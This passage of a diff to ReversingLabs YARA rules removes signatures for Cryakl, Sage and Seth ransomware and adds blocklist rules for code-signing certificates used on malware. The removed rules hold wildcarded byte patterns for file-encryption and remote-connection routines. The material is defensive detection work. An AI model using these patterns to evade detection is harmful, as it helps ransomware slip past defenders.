-            81 EC ?? ?? ?? ?? 53 56 57 8B BC 24 ?? ?? ?? ?? 8B F2 89 74 24 ?? 8B D9 85 FF 0F 84
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B D7 C1 E2 ?? 8B
-            CE E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0
-            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D3 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0
-            0F 84 ?? ?? ?? ?? 55 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B E8
-            83 FD ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 44
-            24 ?? 83 E0 ?? 74 ?? F6 84 24 ?? ?? ?? ?? ?? 75 ?? 85 C0 75 ?? F6 84 24 ?? ?? ?? ??
-            ?? 74 ?? 33 F6 85 FF 74 ?? 8B 44 24 ?? FF 34 B0 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85
-            C0 75 ?? 46 3B F7 72 ?? EB ?? FF B4 24 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 94 24 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 74 ?? FF B4 24 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 8B 74 24 ?? F6 44 24 ?? ?? 74 ?? F6 84 24 ?? ?? ?? ?? ?? 74
-            ?? 8D 44 24 ?? 50 8B D3 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0 74 ?? 83 BC 24
-            ?? ?? ?? ?? ?? 74 ?? FF B4 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B
-            D6 FF B4 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ??
-            ?? FF B4 24 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 55 FF 15 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? EB ?? 83 64 24 ?? ?? 55 FF 15 ?? ?? ?? ?? 5D 5F 5E 5B 81
-            C4 ?? ?? ?? ?? C3
-        }
-		$find_files_2 = {
-            81 EC ?? ?? ?? ?? 8D 44 24 ?? 53 55 56 68 ?? ?? ?? ?? 50 8B D9 FF 15 ?? ?? ?? ?? 8B
-            F0 85 F6 0F 84 ?? ?? ?? ?? 8D 6C 24 ?? 8D 6C 75 ?? 33 C0 66 89 44 74 ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 59 E8 ?? ?? ?? ?? 83 C0 ?? 6A ?? 59 66 89
-            45 ?? E8 ?? ?? ?? ?? 83 C0 ?? 66 89 44 74 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50
-            FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 84 C0 74 ?? 8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 83 64 24 ?? ?? 8D 44
-            24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 53
-            FF 15 ?? ?? ?? ?? 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
-        }
-		$find_files_3 = {
-            81 EC ?? ?? ?? ?? 53 55 56 8B D9 57 8B FA 85 DB 74 ?? 33 D2 E8 ?? ?? ?? ?? 8B F0 85
-            F6 0F 84 ?? ?? ?? ?? 57 56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            83 C4 ?? 8B CE E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 C6 43 ?? ?? FF 15 ?? ?? ?? ??
-            0D ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? 0D ?? ?? ?? ?? 50 57 FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0 0F
-            84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 80 7E ?? ?? 75 ?? 8B 15 ?? ?? ?? ?? 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 ?? ?? ?? ?? 83 64 24 ?? ?? 6A ?? FF 35 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 84 C0
-            0F 85 ?? ?? ?? ?? F7 44 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 56
-            57 FF 15 ?? ?? ?? ?? 50 8B D7 8B CB E8 ?? ?? ?? ?? 59 59 89 44 24 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? F6 44
-            24 ?? ?? 74 ?? 80 7E ?? ?? 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 56 FF B4 24 ??
-            ?? ?? ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 59 59 EB ?? 80 7E ?? ?? 74 ?? 85 DB 74 ?? 83 7C
-            24 ?? ?? 7C ?? 7F ?? 81 7C 24 ?? ?? ?? ?? ?? 72 ?? 80 3E ?? 74 ?? 6A ?? 8D 44 24 ??
-            50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 44 24 ?? 50 FF 74 24 ?? FF 94 24 ?? ?? ?? ??
-            83 C4 ?? 85 C0 74 ?? 8D 44 24 ?? 50 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55
-            FF 15 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_* ) ) and ( all of ( $encrypt_files_* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADVANCED ACCESS SERVICES LTD" and ( pe.signatures [ i ] . serial == "00:ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee" or pe.signatures [ i ] . serial == "ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee" ) and 1650931200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cryakl : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5Da173Eb1Ac76340Ac058E1Ff4Bf5E1B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Cryakl ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5c668278-458e-5b13-83c4-63beab5249ed"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "0f9fa6c6-372d-5948-94ba-9e3fee956647"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Cryakl.yara#L1-L64"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "51d50ab1ce021e2facbca3a35af372186287a8d69b66651c9804234a409d9932"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16456-L16472"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "71da69fca275caead6a822e6587e0a07fc882f712afeafe18f4a595c269f6737"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Cryakl"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_and_encrypt_files_1 = {
-            8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
-            30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 74 ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ??
-            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 83 E0 ?? 83 F8 ?? 75 ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 10 FF 92 ?? ?? ?? ??
-            84 C0 0F 84 ?? ?? ?? ?? FF 75 ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
-        }
-		$enum_and_encrypt_files_2 = {
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ??
-            ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ??
-            C6 45 ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 10 FF 52 ?? 8B D8
-            4B 85 DB 0F 8C ?? ?? ?? ?? 43 33 F6 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 8D ??
-            ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B D6 8B 38 FF 57 ?? 8B
-            85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 75 ?? C6 45 ?? ??
-            46 4B 0F 85 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 A1 ?? ?? ??
-            ?? 50 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ??
-            ?? 83 C0 ?? 83 D2 ?? 89 05 ?? ?? ?? ?? 89 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ??
-            ?? ?? 8B 10 FF 92 ?? ?? ?? ?? 84 C0 75 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $enum_and_encrypt_files_* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALISA LTD" and pe.signatures [ i ] . serial == "5d:a1:73:eb:1a:c7:63:40:ac:05:8e:1f:f4:bf:5e:1b" and 1550793600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sage : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1380A7Ccf2Bf36Bc496B00D8 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sage ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "81f4c666-93f9-51bb-8dda-431ef7a81b74"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "dc473451-e1a9-53b4-acf6-9ff8036ecf31"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Sage.yara#L1-L77"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "69079b7176050096cdbaaaff30dd0359366b3a6a74e8bc17db348794388f71ba"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16474-L16490"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "88708d7d139a9d6e92f78df460b527a1ae6a404d0bcccb801c8c8cb1263a46c6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sage"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection = {
-            83 EC ?? 8B 44 24 ?? 53 55 56 57 8B 7C 24 ?? 8B 77 ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ??
-            8B D8 51 89 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 89 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 89 77 ?? FF 15 ?? ?? ?? ?? 8B E8 89 6C 24 ?? 85 ED 0F 84
-            ?? ?? ?? ?? 8B 74 24 ?? 6A ?? 56 53 55 FF 15 ?? ?? ?? ?? 8B D8 89 5C 24 ?? 85 DB 0F
-            84 ?? ?? ?? ?? 8B 4C 24 ?? 33 C0 BA ?? ?? ?? ?? 66 3B F2 0F 95 C0 48 25 ?? ?? ?? ??
-            50 6A ?? 6A ?? 6A ?? 51 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 8B FF
-            8D 54 24 ?? 52 56 FF D3 8D 44 24 ?? 50 8B 44 24 ?? 50 50 57 E8 ?? ?? ?? ?? 83 C4 ??
-            50 56 FF D5 85 C0 0F 84 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 6A ?? 8D 4C 24 ?? 51 8D 54
-            24 ?? 52 6A ?? 68 ?? ?? ?? ?? 56 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 56 FF 15 ?? ?? ?? ??
-            53 FF 15 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
-            83 C4 ?? 8B 44 24 ?? 5F 5E 5D 5B 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 04 24 83
-            C4 ?? C3 57 E8 ?? ?? ?? ?? 83 C4
-        }
-		$encrypt_files = {
-            83 EC ?? 53 8B 1D ?? ?? ?? ?? 55 8B 6C 24 ?? 56 57 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68
-            ?? ?? ?? ?? 8D 7D ?? 57 FF D3 8B F0 83 FE ?? 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ??
-            ?? 89 44 24 ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B
-            4C 24 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 51 FF D3 8B D8 83 FB ?? 75 ??
-            56 FF 15 ?? ?? ?? ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 83 C4 ?? C3 8B 54 24 ?? 6A ?? 52 57
-            56 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 8B 35 ?? ?? ?? ?? 8B E8 FF D6 53 FF D6 85 ED 79 ??
-            8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 8B C5 5D 5B 83 C4 ?? C3 57 E8 ?? ?? ?? ?? 8B
-            F0 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 8B D8 FF 15 ?? ?? ?? ?? 8B 4C 24 ??
-            6A ?? 53 51 EB ?? 8B 4C 24 ?? BA ?? ?? ?? ?? 3B 55 ?? 1B C0 83 C0 ?? 50 51 57 56 56
-            E8 ?? ?? ?? ?? 83 C4 ?? 56 8B D8 FF 15 ?? ?? ?? ?? 85 DB 79 ?? 5F 5E 5D 8B C3 5B 83
-            C4 ?? C3 57 E8 ?? ?? ?? ?? 8B F0 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B
-            D8 53 57 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5D 33
-            C0 5B 83 C4 ?? C3
-        }
-		$find_files = {
-            53 55 8B 2D ?? ?? ?? ?? 56 57 33 FF 57 57 FF D5 8B F0 85 F6 74 ?? 85 FF 74 ?? 57 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 44 36 ?? 50 6A ?? 8B DE E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 57 56
-            FF D5 8B F0 3B DE 72 ?? 66 83 3F ?? 8B DF 0F 84 ?? ?? ?? ?? 8B 6C 24 ?? 53 8B FB FF
-            15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8D 5C 43 ?? FF D6 85 C0 74 ?? 68
-            ?? ?? ?? ?? 57 FF D6 85 C0 74 ?? 57 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 D3 E2 F6
-            C2 ?? 74 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ?? ?? 6A ?? 89 06 8D 46 ??
-            6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4E ?? 51 C7 46 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            8D 56 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 55 89 46 ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 66 83 3B ?? 0F 85 ?? ?? ?? ?? 5F 5E 5D 5B C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "13:80:a7:cc:f2:bf:36:bc:49:6b:00:d8" and 1478069976 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Seth : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_02Eaf27E6F1575E365Fc7Fe4E0Be43F7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Seth ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "001de900-4556-5428-a243-7ec07a7ed05e"
-		date = "2021-04-02"
-		modified = "2021-04-02"
+		id = "5d1aad80-9444-5cc3-8ff4-b70fb089cda0"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.Seth.yara#L1-L122"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "72a9d902eea2381f40d42faa7f1686c4ca54d364af0cbd8711697bbc1a235646"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16492-L16508"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "333a43bdfbc400727b8eae1efeb03484b959fc45ed6b8b0dd5e6a553fa27e87f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Seth"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8D 85 ??
-            ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
-            89 C1 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 48 8B 95 ??
-            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
-            48 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 0D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 48 8B 85 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48
-            8B 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89
-            C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48
-            8D 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 48 8B 85
-        }
-		$encrypt_files_p2 = {
-            48 89 C2 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 8B 85
-            ?? ?? ?? ?? 89 C2 E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 48 98 48 89 C1 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48
-            63 C8 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48
-            8B 95 ?? ?? ?? ?? 48 8D 45 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 48 63 C8 48 8B 95 ?? ?? ?? ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48
-            8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83
-            BD ?? ?? ?? ?? ?? 74 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
-            89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
-            ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ??
-            48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ??
-            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ??
-            ?? 5B 5D C3
-        }
-		$remote_connection_p1 = {
-            55 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8B 05 ?? ??
-            ?? ?? FF D0 89 C1 E8 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 85 ?? ??
-            ?? ?? 41 89 D0 48 89 C2 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 05 ??
